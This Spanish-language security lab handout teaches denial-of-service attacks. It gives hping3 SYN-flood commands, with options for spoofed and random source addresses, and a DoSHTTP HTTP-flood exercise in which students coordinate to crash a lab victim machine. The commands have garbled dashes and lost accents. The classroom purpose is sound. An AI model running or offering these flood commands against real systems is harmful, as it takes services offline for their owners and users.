ATAQUE DDOS SYNFLODO CON HPING3

HPing es una herramienta en lnea de comandos que nos permite crear y analizar
paquetes TCP/IP, y como tal tiene un muchas utilidades: hacer testing de firewalls,
escaneo de puertos, redes y como no tambin tiene la capacidad de provocar un SYN
Flood Attack (DD0S).
El objetivo de un ataque de este tipo es el envo de peticiones de conexin TCP ms
rpido de lo que una mquina puede procesar, al fin de saturar los recursos y evitar que la
mquina pueda aceptar ms conexiones.
DURACIN DEL LABORATORIO
Tiempo promedio 20 minutos
Tarjetas VNIC en modo Bridge o Int. Y en conectividad
KALI-LINUX: 192.168.1.19/24
BACKBOX: 192.168.1.34/34

1) hping3 p 80 S - - flood 192.168.1.19
-p 80: Es el puerto que elegimos a atacar
-S : Activa el flag Syn
--flood: Le indica a hping que envie los paquetes a la mxima velocidad posible
Ip_victima es la ip o dominio a atacar
Si queremos que nuestra ip no sea visible.
LAB
10


2) hping3 a 192.168.1.100 p 80 S - - flood 192.168.1.19
Genera direcciones de origen al azar
3) Hping3 rand-source p 80 S - - flood 192.168.1.19






INUNDANDO HTTP USANDO DOSHTTP

DoSHTTP es una herramienta para Windows de testeo para la inundacin de
denegacin de servicio (DoS) por HTTP. Se pueden utilizar simultneamente en
varios clientes para emular un ataque de Denegacin de Servicio Distribuida
(DDoS), ayuda a los profesionales para probar el rendimiento del servidor web y
evaluar el software de proteccin. Incluye designacin y presentacin de informes
de puertos.
ESCENARIO DE LABORATORIO
Para ser un experto en seguridad de informacin para una organizacin, Ud. debe
tener un buen conocimiento de cmo llevar a cabo un ataque de Denegacin de
Servicio y Denegacin de servicio Distribuida, detectar y neutralizar manipuladores
de ataque, y mitigar tales ataques.
DURACIN DEL LABORATORIO
Tiempo promedio 20 minutos

VISIN GENERAL DE DENEGACION DE SERVICIO
Denegacin de Servicio (DoS) es un ataque en un computador o red que impide el
uso legtimo de sus recursos. En un ataque DoS, los atacantes inundan un sistema
LAB
11
vctima con solicitudes de servicios ilegtimos o trfico para sobrecargar sus
recursos y evitar de llevar a cabo tareas destinadas.
DESCARGAR DE SU VM: doshttp_setup.exe (3.9MB)
http://www.download3k.com/Install-DoSHTTP.html
TAREAS DE DENEGACION DE SERVICIO POR HTTP
1. Configurar la VM Windows XP con su NIC en modo Bridge y asignar un IP libre
de la LAN
Local, as como carpetas precompartidas para instalar la herramienta
DoSHTTP 2.5.1 Versin por quince das con serial a registrar:
dh10a-0064-5612-1234-37b5-9701

2. Verificar con Wireshark en el host anfitrin si est recibiendo el ataques de VM

3. Puedes visualizar una cantidad de paquetes HTTP(ms de 100 000), que son
inundados a la mquina host anfitrin en poco ms de dos minutos. DoSHTTP
utiliza Multiple Asynchronous sockets para llevar a cabo inundacin HTTP en
contra de la red entera.


ANALISIS DE LABORATORIO
Analizar y documentar el resultado relacionado a este laboratorio.





PREGUNTAS
Evale como DoSHTTP puede ser usado simultneamente en clientes
mltiples y llevar a cabo ataques DDoS, en grupos de cinco realizar un ataque
a una mquina victima simultneamente apuntando los otros cuatro al mismo
objetivo y hacer caer el host.

Determinar cmo puedes prevenir ataques DoS en una red.